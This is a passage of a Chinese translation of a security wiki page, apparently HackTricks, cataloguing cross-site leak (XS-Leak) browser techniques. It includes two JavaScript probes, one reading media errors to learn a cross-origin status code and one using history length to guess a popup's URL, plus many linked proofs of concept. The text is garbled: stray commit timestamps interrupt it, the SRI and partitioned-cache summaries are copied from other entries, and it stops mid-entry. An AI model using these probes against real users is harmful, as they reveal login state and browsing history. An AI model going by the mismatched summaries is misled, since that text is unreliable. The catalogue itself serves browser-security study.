### 重定向持续时间泄漏
* **包含方法**: Fetch API
* **可检测差异**: 重定向
* **更多信息**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
* **摘要**: 当发生重定向时,时间记录的持续时间为负数。
* **代码示例**: [https://xsinator.com/testing.html#Duration%20Redirect%20Leak](https://xsinator.com/testing.html#Duration%20Redirect%20Leak)
在 GC 中,导致 **重定向** 的请求的 **持续时间****负数**,因此可以与不导致重定向的请求区分开来。
2022-06-28 15:48:43 +00:00
### CORP 泄漏
2022-06-28 15:48:43 +00:00
* **包含方法**: 框架
* **可检测差异**: 头部
* **更多信息**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.2)
* **摘要**: 使用 CORP 保护的资源不会创建资源时间记录。
* **代码示例**: [https://xsinator.com/testing.html#Performance%20API%20CORP%20Leak](https://xsinator.com/testing.html#Performance%20API%20CORP%20Leak)
在某些情况下,**nextHopProtocol 记录** 可以用作泄漏技术。在 GC 中,当设置了 **CORP 头部**nextHopProtocol 将为空。请注意,对于启用 CORP 的资源SA 将不会创建任何性能记录。
### 服务工作者
* **包含方法**: 框架
* **可检测差异**: API 使用
* **更多信息**: [https://www.ndss-symposium.org/ndss-paper/awakening-the-webs-sleeper-agents-misusing-service-workers-for-privacy-leakage/](https://www.ndss-symposium.org/ndss-paper/awakening-the-webs-sleeper-agents-misusing-service-workers-for-privacy-leakage/)
* **摘要**: 检测特定来源是否注册了服务工作者。
* **代码示例**:
服务工作者是以事件驱动的脚本上下文,在一个来源上运行。它们在网页的后台运行,可以拦截、修改和 **缓存资源** 以创建离线网络应用。\
如果通过 **iframe** 访问了由 **服务工作者** 缓存的 **资源**,则该资源将从服务工作者缓存中 **加载**。\
要检测资源是否从服务工作者缓存中 **加载**,可以使用 **Performance API**。\
这也可以通过定时攻击来实现(查看论文获取更多信息)。
### 缓存
* **包含方法**: Fetch API
* **可检测差异**: 时间
* **更多信息**: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources)
* **摘要**: 可以检查资源是否存储在缓存中。
* **代码示例**: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-cached-resources), [https://xsinator.com/testing.html#Cache%20Leak%20(POST)](https://xsinator.com/testing.html#Cache%20Leak%20\(POST\))
使用 [Performance API](xs-search.md#performance-api) 可以检查资源是否已缓存。
### 网络持续时间
* **包含方法**: Fetch API
* **可检测差异**: 页面内容
* **更多信息**: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#network-duration](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#network-duration)
* **摘要**: 可以从 `performance` API 中检索请求的网络持续时间。
* **代码示例**: [https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#network-duration](https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#network-duration)
## 错误消息技术
### 媒体错误
* **包含方法**: HTML 元素(视频,音频)
* **可检测差异**: 状态码
* **更多信息**: [https://bugs.chromium.org/p/chromium/issues/detail?id=828265](https://bugs.chromium.org/p/chromium/issues/detail?id=828265)
* **摘要**: 在 Firefox 中,可以准确泄漏跨源请求的状态码。
* **代码示例**: [https://jsbin.com/nejatopusi/1/edit?html,css,js,output](https://jsbin.com/nejatopusi/1/edit?html,css,js,output)
2022-06-28 17:21:21 +00:00
```javascript
// Code saved here in case it dissapear from the link
// Based on MDN MediaError example: https://mdn.github.io/dom-examples/media/mediaerror/
window.addEventListener("load", startup, false);
function displayErrorMessage(msg) {
2023-08-03 19:12:22 +00:00
document.getElementById("log").innerHTML += msg;
2022-06-28 17:21:21 +00:00
}
function startup() {
2023-08-03 19:12:22 +00:00
let audioElement = document.getElementById("audio");
// "https://mdn.github.io/dom-examples/media/mediaerror/assets/good.mp3";
document.getElementById("startTest").addEventListener("click", function() {
audioElement.src = document.getElementById("testUrl").value;
}, false);
// Create the event handler
var errHandler = function() {
let err = this.error;
let message = err.message;
let status = "";
// Chrome error.message when the request loads successfully: "DEMUXER_ERROR_COULD_NOT_OPEN: FFmpegDemuxer: open context failed"
// Firefox error.message when the request loads successfully: "Failed to init decoder"
if((message.indexOf("DEMUXER_ERROR_COULD_NOT_OPEN") != -1) || (message.indexOf("Failed to init decoder") != -1)){
status = "Success";
}else{
status = "Error";
}
displayErrorMessage("<strong>Status: " + status + "</strong> (Error code:" + err.code + " / Error Message: " + err.message + ")<br>");
};
audioElement.onerror = errHandler;
2022-06-28 17:21:21 +00:00
}
```
### CORS错误
2022-06-28 12:20:37 +00:00
- **包含方法**Fetch API
- **可检测差异**:标头
- **更多信息**[https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.3)
- **摘要**在安全断言SACORS错误消息无意中暴露了重定向请求的完整URL。
- **代码示例**[https://xsinator.com/testing.html#CORS%20Error%20Leak](https://xsinator.com/testing.html#CORS%20Error%20Leak)
2022-06-28 12:20:37 +00:00
这种技术使攻击者能够通过利用基于Webkit的浏览器处理CORS请求的方式**提取跨源站点重定向的目标**。具体来说,当向发出基于用户状态的重定向的目标站点发送**启用CORS的请求**,并且浏览器随后拒绝该请求时,错误消息中会披露**重定向目标的完整URL**。这种漏洞不仅揭示了重定向的事实,还暴露了重定向的端点以及可能包含的任何**敏感查询参数**。
2023-03-05 22:20:47 +00:00
### SRI错误
2022-06-27 23:34:20 +00:00
- **包含方法**Fetch API
- **可检测差异**:标头
- **更多信息**[https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.3)
- **摘要**在安全断言SACORS错误消息无意中暴露了重定向请求的完整URL。
- **代码示例**[https://xsinator.com/testing.html#SRI%20Error%20Leak](https://xsinator.com/testing.html#SRI%20Error%20Leak)
2022-06-27 23:34:20 +00:00
攻击者可以利用**冗长的错误消息**推断跨源响应的大小。这是由于子资源完整性SRI的机制它使用完整性属性验证从CDN等地方获取的资源是否被篡改。为了使SRI在跨源资源上起作用这些资源必须是**启用CORS的**否则它们不会受到完整性检查。在安全断言SA就像CORS错误XS-Leak一样可以在带有完整性属性的fetch请求失败后捕获错误消息。攻击者可以通过向完整性属性分配**虚假哈希值**来故意**触发此错误**。在SA中由此产生的错误消息无意中揭示了所请求资源的内容长度。这种信息泄漏使攻击者能够辨别响应大小的变化为复杂的XS-Leak攻击铺平了道路。
2022-06-27 23:34:20 +00:00
### CSP违规/检测
2022-06-27 23:34:20 +00:00
- **包含方法**:弹出窗口
- **可检测差异**:状态码
- **更多信息**[https://bugs.chromium.org/p/chromium/issues/detail?id=313737](https://bugs.chromium.org/p/chromium/issues/detail?id=313737), [https://lists.w3.org/Archives/Public/public-webappsec/2013May/0022.html](https://lists.w3.org/Archives/Public/public-webappsec/2013May/0022.html), [https://xsleaks.dev/docs/attacks/navigations/#cross-origin-redirects](https://xsleaks.dev/docs/attacks/navigations/#cross-origin-redirects)
- **摘要**如果我们访问的受害者网站尝试重定向到不同的域CSP将触发可检测的错误。
- **代码示例**[https://xsinator.com/testing.html#CSP%20Violation%20Leak](https://xsinator.com/testing.html#CSP%20Violation%20Leak), [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#intended-solution-csp-violation](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#intended-solution-csp-violation)
XS-Leak可以使用CSP检测跨源站点是否被重定向到不同的源。此泄漏可以检测重定向但另外重定向目标的域也会泄漏。这种攻击的基本思想是**在攻击者站点上允许目标域**。一旦向目标域发出请求,它**重定向**到一个跨源域。**CSP阻止**对其的访问并创建用作泄漏技术的**违规报告**。根据浏览器的不同,**此报告可能会泄露重定向的目标位置**。\
现代浏览器不会指示重定向到的URL但您仍然可以检测到触发了跨源重定向。
### 缓存
- **包含方法**:框架,弹出窗口
- **可检测差异**:页面内容
- **更多信息**[https://xsleaks.dev/docs/attacks/cache-probing/#cache-probing-with-error-events](https://xsleaks.dev/docs/attacks/cache-probing/#cache-probing-with-error-events), [https://sirdarckcat.blogspot.com/2019/03/http-cache-cross-site-leaks.html](https://sirdarckcat.blogspot.com/2019/03/http-cache-cross-site-leaks.html)
- **摘要**:清除缓存中的文件。打开目标页面检查缓存中是否存在该文件。
- **代码示例**
浏览器可能为所有网站使用一个共享缓存。无论其来源如何,都可以推断目标页面是否**请求了特定文件**。
如果页面仅在用户登录时加载图像,您可以**使资源无效**(因此如果已缓存,则不再缓存,请参阅更多信息链接),**执行可能加载该资源的请求**,并尝试使用**错误请求**加载资源(例如使用过长的引用者标头)。如果资源加载**没有触发任何错误**,那是因为它被**缓存**了。
### CSP指令
- **包含方法**:框架
- **可检测差异**:标头
- **更多信息**[https://bugs.chromium.org/p/chromium/issues/detail?id=1105875](https://bugs.chromium.org/p/chromium/issues/detail?id=1105875)
- **摘要**CSP标头指令可以通过CSP iframe属性进行探测揭示策略细节。
- **代码示例**[https://xsinator.com/testing.html#CSP%20Directive%20Leak](https://xsinator.com/testing.html#CSP%20Directive%20Leak)
Google ChromeGC中的一项新功能允许网页通过在iframe元素上设置属性来**提出内容安全策略CSP**并随HTTP请求传输策略指令。通常嵌入内容必须通过HTTP标头**授权**,否则将显示**错误页面**。但是如果iframe已经受CSP控制并且新提出的策略不比原来更严格页面将正常加载。这种机制为攻击者提供了一种途径可以通过识别错误页面**检测跨源页面的特定CSP指令**。尽管此漏洞被标记为已修复,但我们的发现揭示了一种**新的泄漏技术**,能够检测错误页面,表明根本问题从未完全解决。
### **CORP**
- **包含方法**Fetch API
- **可检测差异**:标头
- **更多信息**[**https://xsleaks.dev/docs/attacks/browser-features/corp/**](https://xsleaks.dev/docs/attacks/browser-features/corp/)
- **摘要**受Cross-Origin Resource PolicyCORP保护的资源在从不允许的来源获取时会引发错误。
- **代码示例**[https://xsinator.com/testing.html#CORP%20Leak](https://xsinator.com/testing.html#CORP%20Leak)
CORP标头是一个相对较新的Web平台安全功能当设置时**阻止不允许的来源的no-cors跨源请求**访问给定资源。可以检测到标头的存在因为受CORP保护的资源在**获取时会引发错误**。
### CORB
* **包含方法**: HTML 元素
* **可检测差异**: 头部
* **更多信息**: [https://xsleaks.dev/docs/attacks/browser-features/corb/#detecting-the-nosniff-header](https://xsleaks.dev/docs/attacks/browser-features/corb/#detecting-the-nosniff-header)
* **摘要**: CORB 可使攻击者检测到请求中是否存在 **`nosniff` 头部**。
* **代码示例**: [https://xsinator.com/testing.html#CORB%20Leak](https://xsinator.com/testing.html#CORB%20Leak)
查看链接以获取有关攻击的更多信息。
### CORS 错误的 Origin Reflection 配置错误
* **包含方法**: Fetch API
* **可检测差异**: 头部
* **更多信息**: [https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration](https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration)
* **摘要**: 如果 Origin 头部在 `Access-Control-Allow-Origin` 头部中反射,就可以检查资源是否已在缓存中。
* **代码示例**: [https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration](https://xsleaks.dev/docs/attacks/cache-probing/#cors-error-on-origin-reflection-misconfiguration)
如果 **Origin 头部**`Access-Control-Allow-Origin` 头部中 **反射**,攻击者可以利用这种行为尝试以 **CORS** 模式 **获取** **资源**。如果没有触发 **错误**,表示它已经 **正确从网络中检索**,如果触发了错误,则表示它是从缓存中 **访问的**(错误出现是因为缓存保存了带有允许原始域而不是攻击者域的 CORS 头部的响应)。\
请注意,如果 Origin 没有反射,而是使用通配符(`Access-Control-Allow-Origin: *`),这种方法将不起作用。
## 可读属性技术
### Fetch 重定向
* **包含方法**: Fetch API
* **可检测差异**: 状态码
* **更多信息**: [https://web-in-security.blogspot.com/2021/02/security-and-privacy-of-social-logins-part3.html](https://web-in-security.blogspot.com/2021/02/security-and-privacy-of-social-logins-part3.html)
* **摘要**: 在重定向完成后GC 和 SA 可以检查响应的类型opaque-redirect
* **代码示例**: [https://xsinator.com/testing.html#Fetch%20Redirect%20Leak](https://xsinator.com/testing.html#Fetch%20Redirect%20Leak)
使用 Fetch API 提交请求时,使用 `redirect: "manual"` 和其他参数,可以读取 `response.type` 属性,如果等于 `opaqueredirect`,则响应是一个重定向。
### COOP
* **包含方法**: 弹出窗口
* **可检测差异**: 头部
* **更多信息**: [https://xsinator.com/paper.pdf](https://xsinator.com/paper.pdf) (5.4), [https://xsleaks.dev/docs/attacks/window-references/](https://xsleaks.dev/docs/attacks/window-references/)
* **摘要**: 受跨域打开策略COOP保护的页面阻止跨域交互访问。
* **代码示例**: [https://xsinator.com/testing.html#COOP%20Leak](https://xsinator.com/testing.html#COOP%20Leak)
攻击者能够推断跨域 HTTP 响应中是否存在跨域打开策略COOP头部。Web 应用程序使用 COOP 阻止外部站点获取任意窗口引用。可以通过尝试访问 **`contentWindow` 引用** 来识别此头部的可见性。在条件应用 COOP 的情况下,**`opener` 属性** 成为一个显著的指标:当 COOP 激活时,它是 **未定义** 的,而在其缺席时是 **已定义** 的。
### URL 最大长度 - 服务器端
* **包含方法**: Fetch API, HTML 元素
* **可检测差异**: 状态码 / 内容
* **更多信息**: [https://xsleaks.dev/docs/attacks/navigations/#server-side-redirects](https://xsleaks.dev/docs/attacks/navigations/#server-side-redirects)
* **摘要**: 由于重定向响应长度可能过大,服务器会以错误响应并生成警报的方式检测响应中的差异。
* **代码示例**: [https://xsinator.com/testing.html#URL%20Max%20Length%20Leak](https://xsinator.com/testing.html#URL%20Max%20Length%20Leak)
如果服务器端重定向使用了 **重定向中的用户输入****额外数据**。可以检测到这种行为,因为通常 **服务器** 有一个 **限制请求长度**。如果 **用户数据** 达到该长度减 1因为 **重定向** 使用了 **该数据****添加** 了一些 **额外内容**,将触发一个 **通过错误事件可检测的错误**
如果您可以向用户设置 cookie还可以通过 **设置足够的 cookie**[**cookie 炸弹**](hacking-with-cookies/cookie-bomb.md))来执行此攻击,因此通过 **增加响应的大小** 触发错误。在这种情况下,请记住,如果您从同一站点触发此请求,`<script>` 将自动发送 cookie因此您可以检查错误。\
在这种情况下,**cookie 炸弹 + XS-Search** 的示例可以在此写作的预期解决方案中找到:[https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#intended)
通常需要 `SameSite=None` 或处于相同上下文中才能进行此类攻击。
### URL 最大长度 - 客户端
* **包含方法**: 弹出窗口
* **可检测差异**: 状态码 / 内容
* **更多信息**: [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)
* **摘要**: 由于重定向响应长度可能过大,请求可能会有差异,从而引起注意。
* **代码示例**: [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)
根据 [Chromium 文档](https://chromium.googlesource.com/chromium/src/+/main/docs/security/url\_display\_guidelines/url\_display\_guidelines.md#URL-Length)Chrome 的最大 URL 长度为 2MB。
> 一般来说_web 平台_ 对 URL 的长度没有限制(尽管 2^31 是一个常见限制。_Chrome_ 限制 URL 的最大长度为 **2MB**,出于实际原因和避免在进程间通信中引起拒绝服务问题的考虑。
2022-06-27 23:34:20 +00:00
因此,如果在某种情况下,**重定向 URL 的响应** 较大,可以使其重定向的 **URL 大于 2MB** 以达到 **长度限制**。当发生这种情况时Chrome 显示一个 **`about:blank#blocked`** 页面。
**显著的差异** 是,如果 **重定向** 已经 **完成**`window.origin` 会抛出一个 **错误**,因为跨域无法访问该信息。但是,如果 **达到了限制** 并且加载的页面是 **`about:blank#blocked`**,窗口的 **`origin`** 仍然是 **父级** 的,这是一个 **可访问的信息**
要达到 **2MB** 所需的所有额外信息可以通过初始 URL 中的 **哈希** 添加,因此它将在重定向中 **使用**
{% content-ref url="xs-search/url-max-length-client-side.md" %}
[url-max-length-client-side.md](xs-search/url-max-length-client-side.md)
{% endcontent-ref %}
### 最大重定向次数
- **包含方法**Fetch API, Frames
- **可检测差异**:状态码
- **更多信息**[https://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.g63edc858f3\_0\_76](https://docs.google.com/presentation/d/1rlnxXUYHY9CHgCMckZsCGH4VopLo4DYMvAcOltma0og/edit#slide=id.g63edc858f3\_0\_76)
- **摘要**:使用浏览器的重定向限制来确定 URL 重定向的发生。
- **代码示例**[https://xsinator.com/testing.html#Max%20Redirect%20Leak](https://xsinator.com/testing.html#Max%20Redirect%20Leak)
如果浏览器的最大重定向次数为 20攻击者可以尝试加载他的页面进行 19 次重定向,最终将受害者发送到被测试的页面。如果触发了错误,则页面尝试重定向受害者。
### 历史记录长度
- **包含方法**Frames, Pop-ups
- **可检测差异**:重定向
- **更多信息**[https://xsleaks.dev/docs/attacks/navigations/](https://xsleaks.dev/docs/attacks/navigations/)
- **摘要**JavaScript 代码可以操纵浏览器历史记录,并且可以通过长度属性访问。
- **代码示例**[https://xsinator.com/testing.html#History%20Length%20Leak](https://xsinator.com/testing.html#History%20Length%20Leak)
**历史 API** 允许 JavaScript 代码操纵浏览器历史记录,这保存了用户访问的页面。攻击者可以使用长度属性作为包含方法:检测 JavaScript 和 HTML 导航。\
检查 `history.length`,让用户导航到一个页面,将其改回同源,并检查 `history.length` 的新值。
### 具有相同 URL 的历史记录长度
- **包含方法**Frames, Pop-ups
- **可检测差异**:如果 URL 与猜测的 URL 相同
- **摘要**:可以通过滥用历史记录长度来猜测框架/弹出窗口的位置是否在特定 URL 中。
- **代码示例**:如下
攻击者可以使用 JavaScript 代码将框架/弹出窗口位置操纵到一个猜测的 URL并立即将其更改为 `about:blank`。如果历史记录长度增加,则意味着 URL 正确,并且有时间增加,因为如果 URL 相同,则不会重新加载。如果长度没有增加,则意味着它尝试加载猜测的 URL但因为我们立即加载了 `about:blank`,当加载猜测的 URL 时,历史记录长度从未增加。
2022-08-08 23:51:39 +00:00
```javascript
async function debug(win, url) {
2023-08-03 19:12:22 +00:00
win.location = url + '#aaa';
win.location = 'about:blank';
await new Promise(r => setTimeout(r, 500));
return win.history.length;
2022-08-08 23:51:39 +00:00
}
win = window.open("https://example.com/?a=b");
await new Promise(r => setTimeout(r, 2000));
console.log(await debug(win, "https://example.com/?a=c"));
win.close();
win = window.open("https://example.com/?a=b");
await new Promise(r => setTimeout(r, 2000));
console.log(await debug(win, "https://example.com/?a=b"));
```
2023-08-03 19:12:22 +00:00
### 帧计数
2022-08-08 23:51:39 +00:00
* **包含方法**: 框架,弹出窗口
* **可检测差异**: 页面内容
* **更多信息**: [https://xsleaks.dev/docs/attacks/frame-counting/](https://xsleaks.dev/docs/attacks/frame-counting/)
* **摘要:** 通过检查 `window.length` 属性评估 iframe 元素的数量。
* **代码示例**: [https://xsinator.com/testing.html#Frame%20Count%20Leak](https://xsinator.com/testing.html#Frame%20Count%20Leak)
2022-06-27 23:34:20 +00:00
通过 `iframe``window.open` 打开的网页中**帧的数量**可能有助于识别**用户在该页面上的状态**。\
此外,如果页面始终具有相同数量的帧,持续检查帧的数量可能有助于识别可能泄露信息的**模式**。
2022-06-27 23:34:20 +00:00
这种技术的一个示例是,在 Chrome 中,可以通过**帧计数**来**检测 PDF**,因为内部使用了 `embed`。存在一些[打开 URL 参数](https://bugs.chromium.org/p/chromium/issues/detail?id=64309#c113),允许对内容进行一些控制,如 `zoom`、`view`、`page`、`toolbar`,这种技术可能会很有趣。
2022-06-28 15:48:43 +00:00
2022-06-28 12:20:37 +00:00
### HTMLElements
* **包含方法**: HTML 元素
* **可检测差异**: 页面内容
* **更多信息**: [https://xsleaks.dev/docs/attacks/element-leaks/](https://xsleaks.dev/docs/attacks/element-leaks/)
* **摘要:** 读取泄露的值以区分两种可能的状态
* **代码示例**: [https://xsleaks.dev/docs/attacks/element-leaks/](https://xsleaks.dev/docs/attacks/element-leaks/), [https://xsinator.com/testing.html#Media%20Dimensions%20Leak](https://xsinator.com/testing.html#Media%20Dimensions%20Leak), [https://xsinator.com/testing.html#Media%20Duration%20Leak](https://xsinator.com/testing.html#Media%20Duration%20Leak)
2022-06-28 12:20:37 +00:00
通过 HTML 元素泄露信息在 Web 安全中是一个问题,特别是当基于用户信息生成动态媒体文件,或者添加水印以改变媒体大小时。攻击者可以利用这一点,通过分析某些 HTML 元素暴露的信息来区分可能的状态。
2022-06-28 12:20:37 +00:00
### HTML 元素泄露的信息
2022-06-28 12:20:37 +00:00
* **HTMLMediaElement**: 此元素显示媒体的 `duration``buffered` 时间,可以通过其 API 访问。[了解更多关于 HTMLMediaElement](https://developer.mozilla.org/en-US/docs/Web/API/HTMLMediaElement)
* **HTMLVideoElement**: 它公开 `videoHeight``videoWidth`。在某些浏览器中,还提供了额外的属性,如 `webkitVideoDecodedByteCount`、`webkitAudioDecodedByteCount` 和 `webkitDecodedFrameCount`,提供了有关媒体内容的更深入信息。[了解更多关于 HTMLVideoElement](https://developer.mozilla.org/en-US/docs/Web/API/HTMLVideoElement)
* **getVideoPlaybackQuality()**: 此函数提供有关视频播放质量的详细信息,包括 `totalVideoFrames`,可以指示处理的视频数据量。[了解更多关于 getVideoPlaybackQuality()](https://developer.mozilla.org/en-US/docs/Web/API/VideoPlaybackQuality)
* **HTMLImageElement**: 此元素泄露图像的 `height``width`。但是,如果图像无效,这些属性将返回 0并且 `image.decode()` 函数将被拒绝,表示未能正确加载图像。[了解更多关于 HTMLImageElement](https://developer.mozilla.org/en-US/docs/Web/API/HTMLImageElement)
2022-06-28 12:20:37 +00:00
### CSS 属性
2022-06-28 12:20:37 +00:00
* **包含方法**: HTML 元素
* **可检测差异**: 页面内容
* **更多信息**: [https://xsleaks.dev/docs/attacks/element-leaks/#abusing-getcomputedstyle](https://xsleaks.dev/docs/attacks/element-leaks/#abusing-getcomputedstyle), [https://scarybeastsecurity.blogspot.com/2008/08/cross-domain-leaks-of-site-logins.html](https://scarybeastsecurity.blogspot.com/2008/08/cross-domain-leaks-of-site-logins.html)
* **摘要:** 识别与用户状态或状态相关的网站样式变化。
* **代码示例**: [https://xsinator.com/testing.html#CSS%20Property%20Leak](https://xsinator.com/testing.html#CSS%20Property%20Leak)
2022-06-28 12:20:37 +00:00
Web 应用程序可能根据用户状态**更改网站样式**。跨域 CSS 文件可以通过**HTML 链接元素**嵌入到攻击者页面中,并且这些**规则**将被**应用**到攻击者页面上。如果页面动态更改这些规则,攻击者可以根据用户状态**检测**这些**差异**。\
作为一种泄漏技术,攻击者可以使用 `window.getComputedStyle` 方法来**读取**特定 HTML 元素的 CSS 属性。因此,如果已知受影响的元素和属性名称,攻击者可以读取任意 CSS 属性。
2022-06-28 12:20:37 +00:00
### CSS 历史
2022-06-28 15:48:43 +00:00
* **包含方法**: HTML 元素
* **可检测差异**: 页面内容
* **更多信息**: [https://xsleaks.dev/docs/attacks/css-tricks/#retrieving-users-history](https://xsleaks.dev/docs/attacks/css-tricks/#retrieving-users-history)
* **摘要:** 检测是否应用了 `:visited` 样式于 URL指示其已被访问过
* **代码示例**: [http://blog.bawolff.net/2021/10/write-up-pbctf-2021-vault.html](http://blog.bawolff.net/2021/10/write-up-pbctf-2021-vault.html)
2023-01-02 23:15:01 +00:00
{% hint style="info" %}
根据[**此**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/),在无头 Chrome 中无效。
2023-01-02 23:15:01 +00:00
{% endhint %}
2022-06-28 15:48:43 +00:00
CSS `:visited` 选择器用于在用户先前访问过的情况下以不同样式显示 URL。过去`getComputedStyle()` 方法可用于识别这些样式差异。然而,现代浏览器已经实施了安全措施,防止此方法揭示链接状态。这些措施包括始终返回计算样式,就像链接已被访问一样,并限制可以使用 `:visited` 选择器应用的样式。
尽管存在这些限制,仍然可以间接地辨别链接的访问状态。一种技术涉及欺骗用户与受 CSS 影响的区域进行交互,特别是利用 `mix-blend-mode` 属性。此属性允许元素与其背景混合,根据用户交互可能显示已访问状态。
此外,可以通过利用链接的渲染时间来实现无需用户交互的检测。由于浏览器可能以不同方式渲染已访问和未访问的链接,这可能导致渲染中的可测时间差异。在 Chromium 缺陷报告中提到了一个概念验证PoC演示了使用多个链接放大时间差异的技术从而通过时间分析使已访问状态可检测。
有关这些属性和方法的更多详细信息,请访问它们的文档页面:
2022-06-28 12:20:37 +00:00
* `:visited`: [MDN 文档](https://developer.mozilla.org/en-US/docs/Web/CSS/:visited)
* `getComputedStyle()`: [MDN 文档](https://developer.mozilla.org/en-US/docs/Web/API/Window/getComputedStyle)
* `mix-blend-mode`: [MDN 文档](https://developer.mozilla.org/en-US/docs/Web/CSS/mix-blend-mode)
### ContentDocument X-Frame Leak
* **Inclusion Methods**: Frames
* **Detectable Difference**: Headers
* **More info**: [https://www.ndss-symposium.org/wp-content/uploads/2020/02/24278-paper.pdf](https://www.ndss-symposium.org/wp-content/uploads/2020/02/24278-paper.pdf)
* **Summary:** 在Google Chrome中当由于X-Frame-Options限制而阻止页面嵌入到跨源站点时会显示专用错误页面。
* **Code Example**: [https://xsinator.com/testing.html#ContentDocument%20X-Frame%20Leak](https://xsinator.com/testing.html#ContentDocument%20X-Frame%20Leak)
2022-06-28 12:20:37 +00:00
在Chrome中如果页面的`X-Frame-Options`头设置为"deny"或"same-origin"并作为对象嵌入将显示错误页面。与在iframes或其他浏览器中不同Chrome为此对象的`contentDocument`属性返回一个空文档对象(而不是`null`。攻击者可以利用这一点检测空文档可能揭示有关用户状态的信息尤其是如果开发人员不一致地设置X-Frame-Options头经常忽视错误页面。意识到并一致应用安全头部对于防止此类泄漏至关重要。
2022-06-28 12:20:37 +00:00
### Download Detection
2022-06-28 12:20:37 +00:00
* **Inclusion Methods**: Frames, Pop-ups
* **Detectable Difference**: Headers
* **More info**: [https://xsleaks.dev/docs/attacks/navigations/#download-trigger](https://xsleaks.dev/docs/attacks/navigations/#download-trigger)
* **Summary:** 攻击者可以利用iframes来识别文件下载iframe的持续可访问性意味着文件下载成功。
* **Code Example**: [https://xsleaks.dev/docs/attacks/navigations/#download-bar](https://xsleaks.dev/docs/attacks/navigations/#download-bar)
2022-06-28 12:20:37 +00:00
特别是`Content-Disposition: attachment`头指示浏览器下载内容而不是内联显示。这种行为可以被利用来检测用户是否可以访问触发文件下载的页面。在基于Chromium的浏览器中有几种技术可以检测此下载行为
2022-06-28 12:20:37 +00:00
1. **下载栏监控**
* 当在基于Chromium的浏览器中下载文件时下载栏会出现在浏览器窗口底部。
* 通过监控窗口高度的变化,攻击者可以推断下载栏的出现,表明已启动下载。
2. **使用iframes进行下载导航**
* 当页面使用`Content-Disposition: attachment`头触发文件下载时,不会导致导航事件。
* 通过在iframe中加载内容并监控导航事件可以检查内容设置是否导致文件下载无导航
3. **不使用iframes进行下载导航**
* 类似于iframe技术此方法涉及使用`window.open`而不是iframe。
* 监控新打开窗口中的导航事件可以揭示文件下载是否被触发(无导航)或内容是否内联显示(发生导航)。
2022-06-28 12:20:37 +00:00
在只有已登录用户可以触发此类下载的情况下,这些技术可用于间接推断用户的身份验证状态,根据浏览器对下载请求的响应。
2022-06-28 12:20:37 +00:00
### Partitioned HTTP Cache Bypass <a href="#partitioned-http-cache-bypass" id="partitioned-http-cache-bypass"></a>
2022-06-28 12:20:37 +00:00
* **Inclusion Methods**: Pop-ups
* **Detectable Difference**: Timing
* **More info**: [https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass](https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass)
* **Summary:** 攻击者可以利用iframes来识别文件下载iframe的持续可访问性意味着文件下载成功。
* **Code Example**: [https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass](https://xsleaks.dev/docs/attacks/navigations/#partitioned-http-cache-bypass), [https://gist.github.com/aszx87410/e369f595edbd0f25ada61a8eb6325722](https://gist.github.com/aszx87410/e369f595edbd0f25ada61a8eb6325722)(来自[https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/)
2022-07-03 09:52:15 +00:00
{% hint style="warning" %}
这就是这种技术有趣的原因Chrome现在具有**缓存分区**,新打开页面的缓存键是:`(https://actf.co, https://actf.co, https://sustenance.web.actf.co/?m=xxx)`但如果我打开一个ngrok页面并在其中使用fetch缓存键将是`(https://myip.ngrok.io, https://myip.ngrok.io, https://sustenance.web.actf.co/?m=xxx)`**缓存键不同**,因此无法共享缓存。您可以在这里找到更多详细信息:[通过分区缓存获得安全性和隐私性](https://developer.chrome.com/blog/http-cache-partitioning/)\
(来自[**这里**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/)
2022-07-03 09:52:15 +00:00
{% endhint %}
2022-06-27 16:53:32 +00:00
如果站点`example.com`包含来自`*.example.com/resource`的资源,则该资源将与直接通过顶级导航请求资源具有**相同的缓存键**。这是因为缓存键由顶级_eTLD+1_和frame _eTLD+1_组成。
2022-06-27 16:53:32 +00:00
由于访问缓存比加载资源更快可以尝试更改页面的位置并在停止后取消20毫秒例如。如果停止后更改了来源则表示资源已被缓存。\
或者只需**向可能已缓存的页面发送一些fetch并测量加载所需的时间**。
2022-06-27 17:09:07 +00:00
### 手动重定向 <a href="#fetch-with-abortcontroller" id="fetch-with-abortcontroller"></a>
2022-06-28 17:21:21 +00:00
* **Inclusion Methods**: Fetch API
* **Detectable Difference**: Redirects
